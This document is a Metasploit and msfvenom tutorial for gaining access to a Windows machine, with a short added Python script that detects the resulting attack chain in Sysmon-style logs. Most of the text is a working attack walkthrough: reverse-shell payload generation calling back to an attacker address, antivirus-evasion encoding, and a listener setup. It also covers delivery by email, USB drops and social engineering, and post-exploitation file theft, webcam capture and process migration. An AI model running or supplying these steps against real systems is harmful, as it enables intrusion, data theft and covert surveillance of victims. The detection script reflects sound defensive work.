Gaining Access to a Windows System Using msfvenom and Metasploit
Legal Notice
This article is intended solely for educational purposes and should be used only in authorized penetration testing environments. Unauthorized access to computer systems is illegal and unethical. Always obtain proper consent before conducting any testing.
Introduction
The Metasploit Framework is a powerful toolset used by penetration testers and security researchers for identifying, exploiting, and validating vulnerabilities. One of its core utilities, msfvenom, enables users to generate payloads tailored to various platforms, encodings, and delivery methods.
This guide covers everything from generating a simple reverse shell payload for Windows systems to using encoders, configuring listeners, and executing post-exploitation tasks using Meterpreter, Metasploit's advanced payload shell.
What is msfvenom?
msfvenom is a command-line tool included with Metasploit that combines two older tools: msfpayload and msfencode. It is used to generate payloads in multiple formats and apply encoding techniques to help evade antivirus detection.
Step-by-Step: Exploiting a Windows Machine
Step 1: Generating a Basic Payload
Let’s start with a basic reverse TCP Meterpreter payload targeting a Windows system.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.105 LPORT=4444 -f exe > /root/Desktop/malicious.exe
Explanation:
- `-p`: Specifies the payload type.
- `LHOST`: IP address of your attacker machine (the address the payload connects back to).
- `LPORT`: Port to listen on.
- `-f exe`: Output format (Windows executable).
- `>`: Output redirection to file.
This payload, when executed on the victim’s system, connects back to the attacker's machine to open a Meterpreter session.
Step 2: Using Encoders (Optional for Evasion)
You can use encoders to obfuscate the payload and attempt to evade detection by antivirus software. Keep in mind that encoders change only the on-disk bytes, not the payload's behaviour, and the shikata_ga_nai decoder stub is widely signatured, so encoding alone rarely defeats a current antivirus engine.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.105 LPORT=4444 -e x86/shikata_ga_nai -i 3 -f exe > /root/Desktop/encoded.exe
Explanation:
- `-e x86/shikata_ga_nai`: Encoder type.
- `-i 3`: Number of iterations (encoding rounds).
- `-f exe`: Output format.
Common Encoders:

Encoder | Platform | Notes
---|---|---
x86/shikata_ga_nai | Windows | Polymorphic XOR additive feedback encoder
x86/countdown | Windows | Single-byte XOR countdown encoder
cmd/powershell_base64 | Windows | Useful for PowerShell payloads
x64/xor | Windows | XOR encoder for 64-bit binaries
To list all available encoders:
msfvenom --list encoders
Step 3: Exploring Payload Options
To list payloads:
msfvenom --list payloads
Categories of Payloads:
- `windows/meterpreter/reverse_tcp`: Reverse shell with advanced features.
- `windows/shell/reverse_tcp`: Basic command shell.
- `linux/x86/meterpreter/reverse_tcp`: For Linux targets.
- `android/meterpreter/reverse_tcp`: For Android devices.
To view required options for a specific payload:
msfvenom -p windows/meterpreter/reverse_tcp --list-options
Step 4: Starting a Listener with Metasploit
Once the payload is ready, open Metasploit and set up the listener:
msfconsole
Then configure:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.0.105
set LPORT 4444
exploit
Now Metasploit is listening for a reverse shell.
Step 5: Deliver the Payload
Transfer malicious.exe to the victim system using:
- USB drops
- Email attachments
- Social engineering techniques
- Embedding in documents using tools like Shellter
Once the victim executes the file, you’ll receive a Meterpreter session.
Step 6: Working with Meterpreter
After the victim executes the payload, you will see output like:
[*] Sending stage (175174 bytes) to 192.168.0.112
[*] Meterpreter session 1 opened
Connect to the session:
sessions
sessions -i 1
Useful Meterpreter Commands
Here are commonly used Meterpreter commands during post-exploitation.
System Info
sysinfo
Displays operating system details and architecture.
Current User
getuid
Shows the current username.
File Navigation
ls
cd Desktop
List files and change directories.
Upload a File
upload /root/tool.exe C:\\Users\\Admin\\Desktop\\
Sends a file to the victim.
Download a File
download C:\\Users\\Admin\\Documents\\secrets.txt /root/Desktop/
Retrieves a file from the victim.
Screenshot
screenshot
Takes a screenshot of the victim's desktop.
Webcam Snap (if hardware present)
webcam_snap
Captures an image using the webcam.
Process Management
ps
Lists running processes.
migrate 4524
Moves Meterpreter into another process (here PID 4524, taken from the ps output) such as explorer.exe, for stealth and stability.
Exit Session
exit
Or kill from main shell:
sessions -k 1
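As an added defender-side example (not part of the original article), the following Python script correlates the footprint the steps above leave on the target host: an unsigned binary launched from a user-writable directory, its reverse_tcp call-back to LHOST:LPORT, and the remote thread that `migrate` creates in explorer.exe. It assumes a simplified JSON event schema loosely modelled on Sysmon events 1, 3 and 8; the `Signed` field and every value except the PID 4524 from the article are constructed.

```python
import json

# Constructed Sysmon-style events (JSON lines) modelling the article's scenario:
# malicious.exe starts from the Desktop (Event 1), calls back to
# LHOST 192.168.0.105 on LPORT 4444 (Event 3), then "migrate 4524" shows up as a
# remote thread created in explorer.exe (Event 8). The firefox lines are benign
# noise; PIDs other than 4524 and the "Signed" field are invented for the sample.
SAMPLE_EVENTS = r"""
{"EventID": 1, "ProcessId": 3140, "Image": "C:\\Users\\Admin\\Desktop\\malicious.exe", "Signed": false}
{"EventID": 3, "ProcessId": 3140, "Image": "C:\\Users\\Admin\\Desktop\\malicious.exe", "DestinationIp": "192.168.0.105", "DestinationPort": 4444}
{"EventID": 8, "SourceProcessId": 3140, "TargetProcessId": 4524, "TargetImage": "C:\\Windows\\explorer.exe"}
{"EventID": 1, "ProcessId": 7788, "Image": "C:\\Program Files\\Mozilla Firefox\\firefox.exe", "Signed": true}
{"EventID": 3, "ProcessId": 7788, "Image": "C:\\Program Files\\Mozilla Firefox\\firefox.exe", "DestinationIp": "203.0.113.10", "DestinationPort": 443}
"""

USER_WRITABLE = ("\\users\\", "\\temp\\", "\\appdata\\")  # where dropped payloads usually land
EXPECTED_PORTS = {80, 443, 53}                             # outbound ports not worth alerting on alone


def analyse(event_lines):
    """Correlate the three event types by PID; returns (rule, pid, detail) tuples."""
    watched = {}   # pid -> image, for unsigned binaries started from user-writable dirs
    findings = []
    for line in event_lines.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        eid = ev["EventID"]
        if eid == 1:
            image = ev["Image"]
            if not ev.get("Signed", False) and any(p in image.lower() for p in USER_WRITABLE):
                watched[ev["ProcessId"]] = image
        elif eid == 3 and ev["ProcessId"] in watched:
            # The stager calling home: a watched process connecting to an unusual port.
            if ev["DestinationPort"] not in EXPECTED_PORTS:
                dest = f'{ev["DestinationIp"]}:{ev["DestinationPort"]}'
                findings.append(("suspicious_outbound", ev["ProcessId"], dest))
        elif eid == 8 and ev["SourceProcessId"] in watched:
            # Migration: the watched process created a thread inside another process.
            findings.append(("remote_thread", ev["SourceProcessId"], ev["TargetImage"]))
    return findings


def likely_migrated_sessions(event_lines):
    """PIDs seen both calling out and injecting a remote thread: the full chain."""
    hits = {}
    for rule, pid, _ in analyse(event_lines):
        hits.setdefault(rule, set()).add(pid)
    return hits.get("suspicious_outbound", set()) & hits.get("remote_thread", set())
```

Running `likely_migrated_sessions(SAMPLE_EVENTS)` returns `{3140}`: the dropped binary alone is a weak signal, but the call-back followed by a remote thread into explorer.exe is the pattern worth paging on.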
Optional: Generate Other File Formats
You can also generate payloads in other formats:
- `-f asp`: ASP script
- `-f war`: Java web archive
- `-f powershell`: PowerShell command
- `-f dll`: Dynamic Link Library
- `-f python`: Python script
Conclusion
This article has walked through the complete process of exploiting a Windows machine using msfvenom and Metasploit—from basic payload creation to advanced post-exploitation using Meterpreter. You've also seen how to enhance payloads with encoders, explore available payload types, and generate alternate formats for different attack vectors.
These techniques are foundational for ethical hackers and penetration testers working in controlled, authorized environments.